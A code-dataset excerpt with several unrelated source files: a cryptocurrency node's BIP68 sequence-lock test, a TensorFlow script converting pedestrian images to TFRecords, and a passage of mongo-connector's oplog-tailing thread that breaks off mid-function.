table += '</table>\n'
return table
if __name__ == '__main__':
a1 = ['Variable 1','Var001']
a2 = ['Variable 2','Var002']
a3 = ['df',99]
a4 = ['t',30.0001]
a5 = ['p',0.003]
a = [a1,a2,a3,a4,a5]
print (table(a))
| gpl-2.0 | 5,365,793,006,503,404,000 | 36.004878 | 134 | 0.521355 | false |
presidentielcoin/presidentielcoin | qa/rpc-tests/bip68-sequence.py | 1 | 18409 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Presidentielcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test BIP68 implementation
#
from test_framework.test_framework import PresidentielcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.blocktools import *
SEQUENCE_LOCKTIME_DISABLE_FLAG = (1<<31)
SEQUENCE_LOCKTIME_TYPE_FLAG = (1<<22) # this means use time (0 means height)
SEQUENCE_LOCKTIME_GRANULARITY = 9 # this is a bit-shift
SEQUENCE_LOCKTIME_MASK = 0x0000ffff
# RPC error for non-BIP68 final transactions
NOT_FINAL_ERROR = "64: non-BIP68-final"
class BIP68Test(PresidentielcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 2
self.setup_clean_chain = False
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-blockprioritysize=0"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-debug", "-blockprioritysize=0", "-acceptnonstdtxn=0"]))
self.is_network_split = False
self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]
connect_nodes(self.nodes[0], 1)
def run_test(self):
# Generate some coins
self.nodes[0].generate(110)
print("Running test disable flag")
self.test_disable_flag()
print("Running test sequence-lock-confirmed-inputs")
self.test_sequence_lock_confirmed_inputs()
print("Running test sequence-lock-unconfirmed-inputs")
self.test_sequence_lock_unconfirmed_inputs()
print("Running test BIP68 not consensus before versionbits activation")
self.test_bip68_not_consensus()
print("Verifying nVersion=2 transactions aren't standard")
self.test_version2_relay(before_activation=True)
print("Activating BIP68 (and 112/113)")
self.activateCSV()
print("Verifying nVersion=2 transactions are now standard")
self.test_version2_relay(before_activation=False)
print("Passed\n")
# Test that BIP68 is not in effect if tx version is 1, or if
# the first sequence bit is set.
def test_disable_flag(self):
# Create some unconfirmed inputs
new_addr = self.nodes[0].getnewaddress()
self.nodes[0].sendtoaddress(new_addr, 2) # send 2 PRC
utxos = self.nodes[0].listunspent(0, 0)
assert(len(utxos) > 0)
utxo = utxos[0]
tx1 = CTransaction()
value = int(satoshi_round(utxo["amount"] - self.relayfee)*COIN)
# Check that the disable flag disables relative locktime.
# If sequence locks were used, this would require 1 block for the
# input to mature.
sequence_value = SEQUENCE_LOCKTIME_DISABLE_FLAG | 1
tx1.vin = [CTxIn(COutPoint(int(utxo["txid"], 16), utxo["vout"]), nSequence=sequence_value)]
tx1.vout = [CTxOut(value, CScript([b'a']))]
tx1_signed = self.nodes[0].signrawtransaction(ToHex(tx1))["hex"]
tx1_id = self.nodes[0].sendrawtransaction(tx1_signed)
tx1_id = int(tx1_id, 16)
# This transaction will enable sequence-locks, so this transaction should
# fail
tx2 = CTransaction()
tx2.nVersion = 2
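        # Clear the disable bit so the relative locktime is actually enforced for this input.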
sequence_value = sequence_value & 0x7fffffff
tx2.vin = [CTxIn(COutPoint(tx1_id, 0), nSequence=sequence_value)]
tx2.vout = [CTxOut(int(value-self.relayfee*COIN), CScript([b'a']))]
tx2.rehash()
try:
self.nodes[0].sendrawtransaction(ToHex(tx2))
except JSONRPCException as exp:
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(False)
# Setting the version back down to 1 should disable the sequence lock,
# so this should be accepted.
tx2.nVersion = 1
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Calculate the median time past of a prior block ("confirmations" before
# the current tip).
def get_median_time_past(self, confirmations):
block_hash = self.nodes[0].getblockhash(self.nodes[0].getblockcount()-confirmations)
return self.nodes[0].getblockheader(block_hash)["mediantime"]
# Test that sequence locks are respected for transactions spending confirmed inputs.
def test_sequence_lock_confirmed_inputs(self):
# Create lots of confirmed utxos, and use them to generate lots of random
# transactions.
max_outputs = 50
addresses = []
while len(addresses) < max_outputs:
addresses.append(self.nodes[0].getnewaddress())
while len(self.nodes[0].listunspent()) < 200:
import random
random.shuffle(addresses)
num_outputs = random.randint(1, max_outputs)
outputs = {}
for i in range(num_outputs):
outputs[addresses[i]] = random.randint(1, 20)*0.01
self.nodes[0].sendmany("", outputs)
self.nodes[0].generate(1)
utxos = self.nodes[0].listunspent()
# Try creating a lot of random transactions.
# Each time, choose a random number of inputs, and randomly set
# some of those inputs to be sequence locked (and randomly choose
# between height/time locking). Small random chance of making the locks
# all pass.
for i in range(400):
# Randomly choose up to 10 inputs
num_inputs = random.randint(1, 10)
random.shuffle(utxos)
# Track whether any sequence locks used should fail
should_pass = True
# Track whether this transaction was built with sequence locks
using_sequence_locks = False
tx = CTransaction()
tx.nVersion = 2
value = 0
for j in range(num_inputs):
sequence_value = 0xfffffffe # this disables sequence locks
# 50% chance we enable sequence locks
if random.randint(0,1):
using_sequence_locks = True
# 10% of the time, make the input sequence value pass
input_will_pass = (random.randint(1,10) == 1)
sequence_value = utxos[j]["confirmations"]
if not input_will_pass:
sequence_value += 1
should_pass = False
# Figure out what the median-time-past was for the confirmed input
# Note that if an input has N confirmations, we're going back N blocks
# from the tip so that we're looking up MTP of the block
# PRIOR to the one the input appears in, as per the BIP68 spec.
orig_time = self.get_median_time_past(utxos[j]["confirmations"])
cur_time = self.get_median_time_past(0) # MTP of the tip
# can only timelock this input if it's not too old -- otherwise use height
can_time_lock = True
if ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY) >= SEQUENCE_LOCKTIME_MASK:
can_time_lock = False
# if time-lockable, then 50% chance we make this a time lock
if random.randint(0,1) and can_time_lock:
# Find first time-lock value that fails, or latest one that succeeds
time_delta = sequence_value << SEQUENCE_LOCKTIME_GRANULARITY
if input_will_pass and time_delta > cur_time - orig_time:
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)
elif (not input_will_pass and time_delta <= cur_time - orig_time):
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)+1
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx.vin.append(CTxIn(COutPoint(int(utxos[j]["txid"], 16), utxos[j]["vout"]), nSequence=sequence_value))
value += utxos[j]["amount"]*COIN
# Overestimate the size of the tx - signatures should be less than 120 bytes, and leave 50 for the output
tx_size = len(ToHex(tx))//2 + 120*num_inputs + 50
tx.vout.append(CTxOut(int(value-self.relayfee*tx_size*COIN/1000), CScript([b'a'])))
rawtx = self.nodes[0].signrawtransaction(ToHex(tx))["hex"]
try:
self.nodes[0].sendrawtransaction(rawtx)
except JSONRPCException as exp:
assert(not should_pass and using_sequence_locks)
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(should_pass or not using_sequence_locks)
# Recalculate utxos if we successfully sent the transaction
utxos = self.nodes[0].listunspent()
# Test that sequence locks on unconfirmed inputs must have nSequence
# height or time of 0 to be accepted.
# Then test that BIP68-invalid transactions are removed from the mempool
# after a reorg.
def test_sequence_lock_unconfirmed_inputs(self):
# Store height so we can easily reset the chain at the end of the test
cur_height = self.nodes[0].getblockcount()
# Create a mempool tx.
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Anyone-can-spend mempool tx.
# Sequence lock of 0 should pass.
tx2 = CTransaction()
tx2.nVersion = 2
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx2_raw = self.nodes[0].signrawtransaction(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(tx2_raw)
# Create a spend of the 0th output of orig_tx with a sequence lock
# of 1, and test what happens when submitting.
# orig_tx.vout[0] must be an anyone-can-spend output
def test_nonzero_locks(orig_tx, node, relayfee, use_height_lock):
sequence_value = 1
if not use_height_lock:
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx = CTransaction()
tx.nVersion = 2
tx.vin = [CTxIn(COutPoint(orig_tx.sha256, 0), nSequence=sequence_value)]
tx.vout = [CTxOut(int(orig_tx.vout[0].nValue - relayfee*COIN), CScript([b'a']))]
tx.rehash()
try:
node.sendrawtransaction(ToHex(tx))
except JSONRPCException as exp:
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
assert(orig_tx.hash in node.getrawmempool())
else:
# orig_tx must not be in mempool
assert(orig_tx.hash not in node.getrawmempool())
return tx
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Now mine some blocks, but make sure tx2 doesn't get mined.
# Use prioritisetransaction to lower the effective feerate to 0
self.nodes[0].prioritisetransaction(tx2.hash, -1e15, int(-self.relayfee*COIN))
cur_time = int(time.time())
for i in range(10):
self.nodes[0].setmocktime(cur_time + 600)
self.nodes[0].generate(1)
cur_time += 600
assert(tx2.hash in self.nodes[0].getrawmempool())
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Mine tx2, and then try again
self.nodes[0].prioritisetransaction(tx2.hash, 1e15, int(self.relayfee*COIN))
# Advance the time on the node so that we can test timelocks
self.nodes[0].setmocktime(cur_time+600)
self.nodes[0].generate(1)
assert(tx2.hash not in self.nodes[0].getrawmempool())
# Now that tx2 is not in the mempool, a sequence locked spend should
# succeed
tx3 = test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
assert(tx3.hash in self.nodes[0].getrawmempool())
self.nodes[0].generate(1)
assert(tx3.hash not in self.nodes[0].getrawmempool())
# One more test, this time using height locks
tx4 = test_nonzero_locks(tx3, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx4.hash in self.nodes[0].getrawmempool())
# Now try combining confirmed and unconfirmed inputs
tx5 = test_nonzero_locks(tx4, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx5.hash not in self.nodes[0].getrawmempool())
utxos = self.nodes[0].listunspent()
tx5.vin.append(CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["vout"]), nSequence=1))
tx5.vout[0].nValue += int(utxos[0]["amount"]*COIN)
raw_tx5 = self.nodes[0].signrawtransaction(ToHex(tx5))["hex"]
try:
self.nodes[0].sendrawtransaction(raw_tx5)
except JSONRPCException as exp:
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(False)
# Test mempool-BIP68 consistency after reorg
#
# State of the transactions in the last blocks:
# ... -> [ tx2 ] -> [ tx3 ]
# tip-1 tip
# And currently tx4 is in the mempool.
#
# If we invalidate the tip, tx3 should get added to the mempool, causing
# tx4 to be removed (fails sequence-lock).
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
assert(tx4.hash not in self.nodes[0].getrawmempool())
assert(tx3.hash in self.nodes[0].getrawmempool())
# Now mine 2 empty blocks to reorg out the current tip (labeled tip-1 in
# diagram above).
# This would cause tx2 to be added back to the mempool, which in turn causes
# tx3 to be removed.
tip = int(self.nodes[0].getblockhash(self.nodes[0].getblockcount()-1), 16)
height = self.nodes[0].getblockcount()
for i in range(2):
block = create_block(tip, create_coinbase(height), cur_time)
block.nVersion = 3
block.rehash()
block.solve()
tip = block.sha256
height += 1
self.nodes[0].submitblock(ToHex(block))
cur_time += 1
mempool = self.nodes[0].getrawmempool()
assert(tx3.hash not in mempool)
assert(tx2.hash in mempool)
# Reset the chain and get rid of the mocktimed-blocks
self.nodes[0].setmocktime(0)
self.nodes[0].invalidateblock(self.nodes[0].getblockhash(cur_height+1))
self.nodes[0].generate(10)
# Make sure that BIP68 isn't being used to validate blocks, prior to
# versionbits activation. If more blocks are mined prior to this test
# being run, then it's possible the test has activated the soft fork, and
# this test should be moved to run earlier, or deleted.
def test_bip68_not_consensus(self):
assert(get_bip9_status(self.nodes[0], 'csv')['status'] != 'active')
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Make an anyone-can-spend transaction
tx2 = CTransaction()
tx2.nVersion = 1
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
# sign tx2
tx2_raw = self.nodes[0].signrawtransaction(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Now make an invalid spend of tx2 according to BIP68
sequence_value = 100 # 100 block relative locktime
tx3 = CTransaction()
tx3.nVersion = 2
tx3.vin = [CTxIn(COutPoint(tx2.sha256, 0), nSequence=sequence_value)]
tx3.vout = [CTxOut(int(tx2.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx3.rehash()
try:
self.nodes[0].sendrawtransaction(ToHex(tx3))
except JSONRPCException as exp:
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(False)
# make a block that violates bip68; ensure that the tip updates
tip = int(self.nodes[0].getbestblockhash(), 16)
block = create_block(tip, create_coinbase(self.nodes[0].getblockcount()+1))
block.nVersion = 3
block.vtx.extend([tx1, tx2, tx3])
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].submitblock(ToHex(block))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
def activateCSV(self):
# activation should happen at block height 432 (3 periods)
min_activation_height = 432
height = self.nodes[0].getblockcount()
assert(height < 432)
self.nodes[0].generate(432-height)
assert(get_bip9_status(self.nodes[0], 'csv')['status'] == 'active')
sync_blocks(self.nodes)
# Use self.nodes[1] to test standardness relay policy
def test_version2_relay(self, before_activation):
inputs = [ ]
outputs = { self.nodes[1].getnewaddress() : 1.0 }
rawtx = self.nodes[1].createrawtransaction(inputs, outputs)
rawtxfund = self.nodes[1].fundrawtransaction(rawtx)['hex']
tx = FromHex(CTransaction(), rawtxfund)
tx.nVersion = 2
tx_signed = self.nodes[1].signrawtransaction(ToHex(tx))["hex"]
try:
tx_id = self.nodes[1].sendrawtransaction(tx_signed)
assert(before_activation == False)
except:
assert(before_activation)
if __name__ == '__main__':
BIP68Test().main()
| mit | 9,144,471,322,893,355,000 | 42.011682 | 119 | 0.610571 | false |
velastin/UAndes | convert_to_records.py | 1 | 7327 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Downloads and converts Flowers data to TFRecords of TF-Example protos.
This module downloads the Flowers data, uncompresses it, reads the files
that make up the Flowers data and creates two TFRecord datasets: one for train
and one for test. Each TFRecord dataset is comprised of a set of TF-Example
protocol buffers, each of which contain a single image and label.
The script should take about a minute to run.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import random
import sys
import argparse
import tensorflow as tf
from datasets import dataset_utils
# The number of images in the validation set.
_NUM_VALIDATION = 350
# Seed for repeatability.
_RANDOM_SEED = 0
# The number of shards per dataset split.
_NUM_SHARDS = 5
class ImageReader(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Initializes function that decodes RGB JPEG data.
self._decode_png_data = tf.placeholder(dtype=tf.string)
self._decode_png = tf.image.decode_png(self._decode_png_data, channels=3)
def read_image_dims(self, sess, image_data):
image = self.decode_png(sess, image_data)
return image.shape[0], image.shape[1]
def decode_png(self, sess, image_data):
image = sess.run(self._decode_png,
feed_dict={self._decode_png_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _get_filenames_and_classes(dataset_dir):
"""Returns a list of filenames and inferred class names.
Args:
dataset_dir: A directory containing a set of subdirectories representing
class names. Each subdirectory should contain PNG or JPG encoded images.
Returns:
A list of image file paths, relative to `dataset_dir` and the list of
subdirectories, representing class names.
"""
pedestrian_root = os.path.join(dataset_dir, 'pedestrian_photos')
directories = []
class_names = []
for filename in os.listdir(pedestrian_root):
path = os.path.join(pedestrian_root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
photo_filenames = []
for directory in directories:
for filename in os.listdir(directory):
path = os.path.join(directory, filename)
photo_filenames.append(path)
return photo_filenames, sorted(class_names)
def _get_dataset_filename(dataset_dir, split_name, shard_id):
output_filename = 'pedestrian_%s_%05d-of-%05d.tfrecord' % (
split_name, shard_id, _NUM_SHARDS)
return os.path.join(dataset_dir, output_filename)
def _convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
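  # Spread each split across _NUM_SHARDS TFRecord files of roughly equal size.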
num_per_shard = int(math.ceil(len(filenames) / float(_NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(sess, image_data)
class_name = os.path.basename(os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'png', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush()
def _clean_up_temporary_files(dataset_dir):
"""Removes temporary files used to create the dataset.
Args:
dataset_dir: The directory where the temporary files are stored.
"""
filename = _DATA_URL.split('/')[-1]
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
tmp_dir = os.path.join(dataset_dir, 'pedestrian_photos')
tf.gfile.DeleteRecursively(tmp_dir)
def _dataset_exists(dataset_dir):
for split_name in ['train', 'validation']:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
if not tf.gfile.Exists(output_filename):
return False
return True
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
if _dataset_exists(dataset_dir):
print('Dataset files already exist. Exiting without re-creating them.')
return
photo_filenames, class_names = _get_filenames_and_classes(dataset_dir)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
# Divide into train and test:
random.seed(_RANDOM_SEED)
random.shuffle(photo_filenames)
training_filenames = photo_filenames[_NUM_VALIDATION:]
validation_filenames = photo_filenames[:_NUM_VALIDATION]
# First, convert the training and validation sets.
_convert_dataset('train', training_filenames, class_names_to_ids,
dataset_dir)
_convert_dataset('validation', validation_filenames, class_names_to_ids,
dataset_dir)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
#_clean_up_temporary_files(dataset_dir)
  print('\nFinished converting the pedestrian dataset!')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='convert dataset to tf records')
parser.add_argument('dataset_dir', help='path to the dataset')
args = parser.parse_args()
run(args.dataset_dir)
| gpl-3.0 | -1,976,234,764,730,661,400 | 29.529167 | 80 | 0.684318 | false |
gwaller/mongo-connector | mongo_connector/oplog_manager.py | 1 | 30523 | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import pymongo
import sys
import time
import threading
import traceback
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.util import retry_until_ok
from pymongo import MongoClient
class OplogThread(threading.Thread):
"""OplogThread gathers the updates for a single oplog.
"""
def __init__(self, primary_conn, main_address, oplog_coll, is_sharded,
doc_manager, oplog_progress_dict, namespace_set, auth_key,
auth_username, repl_set=None, collection_dump=True,
batch_size=DEFAULT_BATCH_SIZE, fields=None,
dest_mapping={}, continue_on_error=False):
"""Initialize the oplog thread.
"""
super(OplogThread, self).__init__()
self.batch_size = batch_size
#The connection to the primary for this replicaSet.
self.primary_connection = primary_conn
#Boolean chooses whether to dump the entire collection if no timestamp
# is present in the config file
self.collection_dump = collection_dump
#The mongos for sharded setups
#Otherwise the same as primary_connection.
#The value is set later on.
self.main_connection = None
#The connection to the oplog collection
self.oplog = oplog_coll
#Boolean describing whether the cluster is sharded or not
self.is_sharded = is_sharded
#A document manager for each target system.
#These are the same for all threads.
if type(doc_manager) == list:
self.doc_managers = doc_manager
else:
self.doc_managers = [doc_manager]
#Boolean describing whether or not the thread is running.
self.running = True
#Stores the timestamp of the last oplog entry read.
self.checkpoint = None
#A dictionary that stores OplogThread/timestamp pairs.
#Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
#The set of namespaces to process from the mongo cluster.
self.namespace_set = namespace_set
#The dict of source namespaces to destination namespaces
self.dest_mapping = dest_mapping
#Whether the collection dump gracefully handles exceptions
self.continue_on_error = continue_on_error
#If authentication is used, this is an admin password.
self.auth_key = auth_key
#This is the username used for authentication.
self.auth_username = auth_username
# Set of fields to export
self._fields = set(fields) if fields else None
logging.info('OplogThread: Initializing oplog thread')
if is_sharded:
self.main_connection = MongoClient(main_address)
else:
self.main_connection = MongoClient(main_address,
replicaSet=repl_set)
self.oplog = self.main_connection['local']['oplog.rs']
if auth_key is not None:
#Authenticate for the whole system
self.primary_connection['admin'].authenticate(
auth_username, auth_key)
self.main_connection['admin'].authenticate(
auth_username, auth_key)
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
logging.warning('%s %s' % (err_msg, self.primary_connection))
@property
def fields(self):
return self._fields
@fields.setter
def fields(self, value):
if value:
self._fields = set(value)
# Always include _id field
self._fields.add('_id')
else:
self._fields = None
def run(self):
"""Start the oplog worker.
"""
logging.debug("OplogThread: Run thread started")
while self.running is True:
logging.debug("OplogThread: Getting cursor")
cursor = self.init_cursor()
logging.debug("OplogThread: Got the cursor, go go go!")
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
#The only entry is the last one we processed
if cursor is None or util.retry_until_ok(cursor.count) == 1:
logging.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
last_ts = None
err = False
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
logging.debug("OplogThread: about to process new oplog "
"entries")
while cursor.alive and self.running:
logging.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
logging.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
# Break out if this thread should stop
if not self.running:
break
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
continue
# Take fields out of the oplog entry that
# shouldn't be replicated. This may nullify
# the document if there's nothing to do.
if not self.filter_oplog_entry(entry):
continue
#sync the current oplog operation
operation = entry['op']
ns = entry['ns']
# use namespace mapping if one exists
ns = self.dest_mapping.get(entry['ns'], ns)
for docman in self.doc_managers:
try:
logging.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
# Remove
if operation == 'd':
entry['_id'] = entry['o']['_id']
entry['ns'] = ns
docman.remove(entry)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
doc['_ts'] = util.bson_ts_to_long(
entry['ts'])
doc['ns'] = ns
docman.upsert(doc)
upsert_inc += 1
# Update
elif operation == 'u':
doc = {"_id": entry['o2']['_id'],
"_ts": util.bson_ts_to_long(
entry['ts']),
"ns": ns}
# 'o' field contains the update spec
docman.update(doc, entry.get('o', {}))
update_inc += 1
except errors.OperationFailed:
logging.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
logging.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
logging.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
logging.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1 and last_ts is not None:
self.checkpoint = last_ts
self.update_checkpoint()
# update timestamp after running through oplog
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after"
"processing new oplog entries")
self.checkpoint = last_ts
self.update_checkpoint()
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
logging.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
err = True
if err is True and self.auth_key is not None:
self.primary_connection['admin'].authenticate(
self.auth_username, self.auth_key)
self.main_connection['admin'].authenticate(
self.auth_username, self.auth_key)
err = False
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.checkpoint = last_ts
self.update_checkpoint()
logging.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
logging.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
def filter_oplog_entry(self, entry):
"""Remove fields from an oplog entry that should not be replicated."""
if not self._fields:
return entry
def pop_excluded_fields(doc):
for key in set(doc) - self._fields:
doc.pop(key)
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
pop_excluded_fields(entry['o'])
# 'u' indicates an update. 'o' field is the update spec.
elif entry['op'] == 'u':
pop_excluded_fields(entry['o'].get("$set", {}))
pop_excluded_fields(entry['o'].get("$unset", {}))
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry['o'] and not entry['o']['$set']:
entry['o'].pop("$set")
if "$unset" in entry['o'] and not entry['o']['$unset']:
entry['o'].pop("$unset")
if not entry['o']:
return None
return entry
def get_oplog_cursor(self, timestamp):
"""Move cursor to the proper place in the oplog.
"""
logging.debug("OplogThread: Getting the oplog cursor and moving it "
"to the proper place in the oplog.")
if timestamp is None:
return None
cursor, cursor_len = None, 0
while (True):
try:
logging.debug("OplogThread: Getting the oplog cursor "
"in the while true loop for get_oplog_cursor")
if not self.namespace_set:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp}},
tailable=True, await_data=True
)
else:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp},
'ns': {'$in': self.namespace_set}},
tailable=True, await_data=True
)
# Applying 8 as the mask to the cursor enables OplogReplay
cursor.add_option(8)
logging.debug("OplogThread: Cursor created, getting a count.")
cursor_len = cursor.count()
logging.debug("OplogThread: Count is %d" % cursor_len)
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
pass
if cursor_len == 0:
logging.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
#rollback, we are past the last element in the oplog
timestamp = self.rollback()
logging.info('Finished rollback')
return self.get_oplog_cursor(timestamp)
first_oplog_entry = retry_until_ok(lambda: cursor[0])
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry.get("ts"))
given_ts_long = util.bson_ts_to_long(timestamp)
if cursor_ts_long > given_ts_long:
# first entry in oplog is beyond timestamp, we've fallen behind!
return None
elif cursor_len == 1: # means we are the end of the oplog
self.checkpoint = timestamp
#to commit new TS after rollbacks
return cursor
elif cursor_len > 1:
doc = retry_until_ok(next, cursor)
if timestamp == doc['ts']:
return cursor
else: # error condition
logging.error('OplogThread: %s Bad timestamp in config file'
% self.oplog)
return None
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
dump_set = self.namespace_set or []
logging.debug("OplogThread: Dumping set of collections %s " % dump_set)
#no namespaces specified
if not self.namespace_set:
db_list = retry_until_ok(self.main_connection.database_names)
for database in db_list:
if database == "config" or database == "local":
